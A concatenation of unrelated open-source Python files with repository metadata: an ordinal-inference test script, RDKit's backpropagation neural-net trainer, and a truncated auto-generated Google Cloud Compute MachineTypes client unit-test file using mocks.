print doc
#config = InConfig().generate_pyry_inconfig("config.txt")
instr = InStructures()
instr.generate_pyry_instructures("problems", "problems")
inseq = InSequences().generate_pyry_insequences("problems.fasta", instr.structures)
#print get_pyry_command()
|
mdobrychlop/pyry3d_chimera_extension
|
PyRy3D_input_generator.py
|
Python
|
gpl-3.0
| 14,149
|
[
"Biopython"
] |
7315283642a90f9f259dc884b9a2506db65c960100f0ac662459c101215e18a5
|
"""
Test of ordinalInference
w are generated from N(0,1)
"""
from ordinalInference import *
VERBOSE = False
def testModel(d, n, sigma, true_w, B, useSigma, selfComparisons=False):
global VERBOSE
training_y = np.zeros(n).astype(float)
training_ab = np.zeros((n,2)).astype(int)
num_data_errors = 0.0
for i in range(n):
ai = np.random.randint(d)
bi = np.random.randint(d)
if not selfComparisons:
while ai == bi:
bi = np.random.randint(d)
training_ab[i,0] = ai
training_ab[i,1] = bi
training_y[i] = np.sign((true_w[ai] - true_w[bi]) + np.random.normal(0,sigma))
if training_y[i] == 0:
training_y[i] = 1
if bool(true_w[ai] > true_w[bi]) != bool(training_y[i] == 1):
num_data_errors += 1
if useSigma:
inferred_w = ordinalInferenceGivenSigma(d, training_y, training_ab, B, sigma)
inferred_sigma = sigma
else:
(inferred_w, inferred_sigma) = \
ordinalInference(d, training_y, training_ab, B=B, VERBOSE=VERBOSE)
#print 'FRAC DATA ERRORS: %g' % (num_data_errors/n)
return (np.asarray([n, np.square(np.linalg.norm(true_w - inferred_w, 2))/d]), inferred_w, inferred_sigma)
d = 2
n_vals = np.asarray([1, 2, 4, 8, 16, 32, 64]) * d
sigma = 2 # Gaussian noise stddev
ntrials = 10
selfComparisons = False
true_w = np.random.normal(size=(d))
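# Center true_w: pairwise comparisons identify w only up to an additive
# constant, so fixing sum(w) = 0 makes the L2 error against inferred_w meaningful.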
true_w -= np.sum(true_w) / d
true_B = np.max(np.fabs(true_w))
print 'True w: %s' % str(true_w)
print 'Testing with true sigma = %g...\n' % sigma
print '\nResults'
if d <= 10:
wstr = '\tAvg w'
else:
wstr = ''
print 'n\tL2error/n' + wstr
for n in n_vals:
L2error = 0.0
avg_w = np.zeros(d)
for trial in range(ntrials):
(r_, w_, s_) = testModel(d, n, sigma, true_w, B=true_B,
useSigma=True,
selfComparisons=selfComparisons)
L2error += r_[1]
avg_w += w_
L2error /= ntrials
avg_w /= ntrials
if d <= 10:
wstr = '\t' + str(avg_w)
print '%d\t%g%s' % (n, L2error, wstr)
print ''
#raise Exception()
print 'Testing choosing sigma using CV...\n'
print '\nResults'
if d <= 10:
wstr = '\tAvg sigma\tAvg w'
else:
wstr = ''
print 'n\tL2error/n' + wstr
for n in n_vals:
if n < 8:
continue # too small to do crossval
L2error = 0.0
avg_w = np.zeros(d)
avg_sigma = 0
for trial in range(ntrials):
(r_, w_, s_) = testModel(d, n, sigma, true_w, B=true_B, useSigma=False)
L2error += r_[1]
avg_w += w_
avg_sigma += s_
L2error /= ntrials
avg_w /= ntrials
avg_sigma /= ntrials
if d <= 10:
wstr = '\t' + str(avg_sigma) + '\t' + str(avg_w)
print '%d\t%g%s' % (n, L2error, wstr)
print ''
|
jkbradley/peergrade
|
cardinalVSordinal/ordinalInference_test.py
|
Python
|
apache-2.0
| 2,809
|
[
"Gaussian"
] |
8a63d6552d177ba2a904bd7f48d7195f228e68cc19ffed770bd884ade8534153
|
#
# Copyright (C) 2000-2008 greg Landrum
#
""" Training algorithms for feed-forward neural nets
Unless noted otherwise, algorithms and notation are taken from:
"Artificial Neural Networks: Theory and Applications",
Dan W. Patterson, Prentice Hall, 1996
"""
import numpy
class Trainer(object):
""" "virtual base class" for network trainers
"""
pass
class BackProp(Trainer):
"""implement back propagation (algorithm on pp 153-154 of Patterson)
I don't *think* that I've made any assumptions about the connectivity of
the net (i.e. full connectivity between layers is not required).
**NOTE:** this code is currently making the assumption that the activation
functions on the nodes in the network are capable of calculating their
derivatives using only their values (i.e. a DerivFromVal method should
exist). This shouldn't be too hard to change.
"""
def StepUpdate(self, example, net, resVect=None):
""" does a BackProp step based upon the example
**Arguments**
- example: a 2-tuple:
         1) a list of variable values
2) a list of result values (targets)
- net: a _Network_ (or something supporting the same API)
- resVect: if this is nonzero, then the network is not required to
classify the _example_
**Returns**
the backprop error from _network_ **before the update**
**Note**
In case it wasn't blindingly obvious, the weights in _network_ are modified
in the course of taking a backprop step.
"""
totNumNodes = net.GetNumNodes()
if self.oldDeltaW is None:
self.oldDeltaW = numpy.zeros(totNumNodes, numpy.float64)
outputNodeList = net.GetOutputNodeList()
nOutput = len(outputNodeList)
targetVect = numpy.array(example[-nOutput:], numpy.float64)
trainVect = example[:-nOutput]
if resVect is None:
# classify the example
net.ClassifyExample(trainVect)
resVect = net.GetLastOutputs()
outputs = numpy.take(resVect, outputNodeList)
errVect = targetVect - outputs
delta = numpy.zeros(totNumNodes, numpy.float64)
# start with the output layer
for i in range(len(outputNodeList)):
idx = outputNodeList[i]
node = net.GetNode(idx)
# the deltas here are easy
delta[idx] = errVect[i] * node.actFunc.DerivFromVal(resVect[idx])
# use these results to start working on the deltas of the preceding layer
inputs = node.GetInputs()
weights = delta[idx] * node.GetWeights()
for j in range(len(inputs)):
idx2 = inputs[j]
delta[idx2] = delta[idx2] + weights[j]
# now propagate the deltas backwards
for layer in range(net.GetNumHidden() - 1, -1, -1):
nodesInLayer = net.GetHiddenLayerNodeList(layer)
for idx in nodesInLayer:
node = net.GetNode(idx)
# start by finishing off the error term for this guy
delta[idx] = delta[idx] * node.actFunc.DerivFromVal(resVect[idx])
# and then propagate our errors to the preceding layer
if layer != 0:
inputs = node.GetInputs()
weights = delta[idx] * node.GetWeights()
for i in range(len(inputs)):
idx2 = inputs[i]
delta[idx2] = delta[idx2] + weights[i]
# okey dokey... we've now got the deltas for each node, use those
# to update the weights (whew!)
nHidden = net.GetNumHidden()
for layer in range(0, nHidden + 1):
if layer == nHidden:
idxList = net.GetOutputNodeList()
else:
idxList = net.GetHiddenLayerNodeList(layer)
for idx in idxList:
node = net.GetNode(idx)
dW = self.speed * delta[idx] * numpy.take(resVect, node.GetInputs())
newWeights = node.GetWeights() + dW
node.SetWeights(newWeights)
# return the RMS error from the OLD network
return numpy.sqrt(errVect * errVect)[0]
def TrainOnLine(self, examples, net, maxIts=5000, errTol=0.1, useAvgErr=1, silent=0):
""" carries out online training of a neural net
The definition of online training is that the network is updated after
each example is presented.
**Arguments**
      - examples: a list of 2-tuples:
         1) a list of variable values
2) a list of result values (targets)
- net: a _Network_ (or something supporting the same API)
- maxIts: the maximum number of *training epochs* (see below for definition) to be
run
- errTol: the tolerance for convergence
- useAvgErr: if this toggle is nonzero, then the error at each step will be
divided by the number of training examples for the purposes of checking
convergence.
- silent: controls the amount of visual noise produced as this runs.
**Note**
a *training epoch* is one complete pass through all the training examples
"""
nExamples = len(examples)
converged = 0
cycle = 0
while (not converged) and (cycle < maxIts):
maxErr = 0
newErr = 0
# print('bp: ',cycle)
for example in examples:
localErr = self.StepUpdate(example, net)
newErr += localErr
if localErr > maxErr:
maxErr = localErr
if useAvgErr == 1:
newErr = newErr / nExamples
else:
newErr = maxErr
# print('\t',newErr,errTol)
if newErr <= errTol:
converged = 1
# if cycle % 10 == 0 and not silent:
if not silent:
print('epoch %d, error: % 6.4f' % (cycle, newErr))
cycle = cycle + 1
if not silent:
if converged:
print('Converged after %d epochs.' % cycle)
else:
print('NOT Converged after %d epochs.' % cycle)
print('final error: % 6.4f' % newErr)
def __init__(self, speed=0.5, momentum=0.7):
""" Constructor
**Arguments**
- speed: the speed parameter for back prop training
- momentum: the momentum term for back prop training
*Not currently used*
"""
self.speed = speed
self.momentum = momentum
self.oldDeltaW = None
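# Minimal usage sketch (mirrors the testAnd/testOr demos below; assumes the
# rdkit.ML.Neural.Network API they use):
#   net = Network.Network([3, 1])      # 3 inputs (last acts as bias), 1 output
#   trainer = BackProp(speed=0.5)
#   trainer.TrainOnLine(examples, net, maxIts=1000)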
if __name__ == '__main__': # pragma: nocover
from rdkit.ML.Neural import Network
def testAnd():
examples = [[[0, 0, 1], [0.1]], [[0, 1, 1], [.1]], [[1, 0, 1], [.1]], [[1, 1, 1], [.9]]]
net = Network.Network([3, 1])
t = BackProp()
t.TrainOnLine(examples, net)
return net
def testOr():
examples = [[[0, 0, 1], [0.1]], [[0, 1, 1], [.9]], [[1, 0, 1], [.9]], [[1, 1, 1], [.9]]]
net = Network.Network([3, 1])
t = BackProp()
t.TrainOnLine(examples, net, maxIts=1000, useAvgErr=0)
print('classifications:')
for example in examples:
res = net.ClassifyExample(example[0])
print('%f -> %f' % (example[1][0], res))
return net
def testXor():
examples = [[[0, 0, 1], [.1]], [[0, 1, 1], [.9]], [[1, 0, 1], [.9]], [[1, 1, 1], [.1]]]
net = Network.Network([3, 3, 1])
t = BackProp(speed=.8)
t.TrainOnLine(examples, net, errTol=0.2)
return net
def testLinear():
examples = [
[.1, .1],
[.2, .2],
[.3, .3],
[.4, .4],
[.8, .8],
]
net = Network.Network([1, 2, 1])
t = BackProp(speed=.8)
t.TrainOnLine(examples, net, errTol=0.1, useAvgErr=0)
print('classifications:')
for example in examples:
res = net.ClassifyExample(example[:-1])
print('%f -> %f' % (example[-1], res))
return net
def runProfile(command):
import random
random.seed(23)
import profile
import pstats
datFile = '%s.prof.dat' % (command)
profile.run('%s()' % command, datFile)
stats = pstats.Stats(datFile)
stats.strip_dirs()
stats.sort_stats('time').print_stats()
if 0:
net = testXor()
print('Xor:', net)
import pickle
outF = open('xornet.pkl', 'wb+')
pickle.dump(net, outF)
outF.close()
else:
# runProfile('testLinear')
net = testLinear()
# net = testOr()
|
ptosco/rdkit
|
rdkit/ML/Neural/Trainers.py
|
Python
|
bsd-3-clause
| 7,994
|
[
"RDKit"
] |
0704b9617a658f0e6aa6e507cd21218a17f4c8765cd46d2804dba0cf3b23400a
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
from collections.abc import Iterable
import json
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests import Request, PreparedRequest
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.machine_types import MachineTypesClient
from google.cloud.compute_v1.services.machine_types import pagers
from google.cloud.compute_v1.services.machine_types import transports
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert MachineTypesClient._get_default_mtls_endpoint(None) is None
assert (
MachineTypesClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
MachineTypesClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert MachineTypesClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class,transport_name", [(MachineTypesClient, "rest"),])
def test_machine_types_client_from_service_account_info(client_class, transport_name):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info, transport=transport_name)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
@pytest.mark.parametrize(
"transport_class,transport_name", [(transports.MachineTypesRestTransport, "rest"),]
)
def test_machine_types_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class,transport_name", [(MachineTypesClient, "rest"),])
def test_machine_types_client_from_service_account_file(client_class, transport_name):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == (
"compute.googleapis.com{}".format(":443")
if transport_name in ["grpc", "grpc_asyncio"]
else "https://{}".format("compute.googleapis.com")
)
def test_machine_types_client_get_transport_class():
transport = MachineTypesClient.get_transport_class()
available_transports = [
transports.MachineTypesRestTransport,
]
assert transport in available_transports
transport = MachineTypesClient.get_transport_class("rest")
assert transport == transports.MachineTypesRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest"),],
)
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
def test_machine_types_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(MachineTypesClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(MachineTypesClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(MachineTypesClient, transports.MachineTypesRestTransport, "rest", "true"),
(MachineTypesClient, transports.MachineTypesRestTransport, "rest", "false"),
],
)
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_machine_types_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize("client_class", [MachineTypesClient])
@mock.patch.object(
MachineTypesClient, "DEFAULT_ENDPOINT", modify_default_endpoint(MachineTypesClient)
)
def test_machine_types_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest"),],
)
def test_machine_types_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[(MachineTypesClient, transports.MachineTypesRestTransport, "rest", None),],
)
def test_machine_types_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"request_type", [compute.AggregatedListMachineTypesRequest, dict,]
)
def test_aggregated_list_rest(request_type):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
unreachables=["unreachables_value"],
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.AggregatedListPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
assert response.unreachables == ["unreachables_value"]
def test_aggregated_list_rest_required_fields(
request_type=compute.AggregatedListMachineTypesRequest,
):
transport_class = transports.MachineTypesRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).aggregated_list._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).aggregated_list._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
(
"filter",
"include_all_scopes",
"max_results",
"order_by",
"page_token",
"return_partial_success",
)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.MachineTypeAggregatedList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_aggregated_list_rest_unset_required_fields():
transport = transports.MachineTypesRestTransport(
        credentials=ga_credentials.AnonymousCredentials()
)
unset_fields = transport.aggregated_list._get_unset_required_fields({})
assert set(unset_fields) == (
set(
(
"filter",
"includeAllScopes",
"maxResults",
"orderBy",
"pageToken",
"returnPartialSuccess",
)
)
& set(("project",))
)
@pytest.mark.parametrize("null_interceptor", [True, False])
def test_aggregated_list_rest_interceptors(null_interceptor):
transport = transports.MachineTypesRestTransport(
credentials=ga_credentials.AnonymousCredentials(),
interceptor=None
if null_interceptor
else transports.MachineTypesRestInterceptor(),
)
client = MachineTypesClient(transport=transport)
with mock.patch.object(
type(client.transport._session), "request"
) as req, mock.patch.object(
path_template, "transcode"
) as transcode, mock.patch.object(
transports.MachineTypesRestInterceptor, "post_aggregated_list"
) as post, mock.patch.object(
transports.MachineTypesRestInterceptor, "pre_aggregated_list"
) as pre:
pre.assert_not_called()
post.assert_not_called()
transcode.return_value = {
"method": "post",
"uri": "my_uri",
"body": None,
"query_params": {},
}
req.return_value = Response()
req.return_value.status_code = 200
req.return_value.request = PreparedRequest()
req.return_value._content = compute.MachineTypeAggregatedList.to_json(
compute.MachineTypeAggregatedList()
)
request = compute.AggregatedListMachineTypesRequest()
metadata = [
("key", "val"),
("cephalopod", "squid"),
]
pre.return_value = request, metadata
post.return_value = compute.MachineTypeAggregatedList
client.aggregated_list(
request, metadata=[("key", "val"), ("cephalopod", "squid"),]
)
pre.assert_called_once()
post.assert_called_once()
def test_aggregated_list_rest_bad_request(
transport: str = "rest", request_type=compute.AggregatedListMachineTypesRequest
):
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.aggregated_list(request)
def test_aggregated_list_rest_flattened():
client = MachineTypesClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.MachineTypeAggregatedList()
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
# Wrap the value into a proper Response obj
